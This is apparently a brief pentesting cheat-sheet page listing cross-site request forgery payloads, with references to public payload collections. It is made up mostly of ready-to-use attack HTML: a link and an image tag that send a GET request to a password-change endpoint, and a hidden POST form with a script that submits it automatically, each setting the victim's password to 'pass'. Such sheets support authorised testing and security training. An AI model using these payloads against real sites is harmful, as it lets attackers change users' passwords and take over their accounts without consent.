CSRF (Cross Site Request Forgery)

Payloads

GET

<!-- Requires user interaction -->
<a href="http://10.10.10.10/changepasswd.php?pass=pass">Click Me</a>

<!-- No user interaction required -->
<img src="http://10.10.10.10/changepasswd.php?pass=pass">

POST

<form id="form" action="http://<host>/changepasswd.php" method="POST">
 <input name="pass" type="hidden" value="pass" />
 <input type="submit" value="Submit" />
</form>

<!-- Auto submit -->
<script>
 document.getElementById("form").submit();
</script>

References

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSRF%20Injection https://book.hacktricks.xyz/pentesting-web/csrf-cross-site-request-forgery

Last updated 9 days ago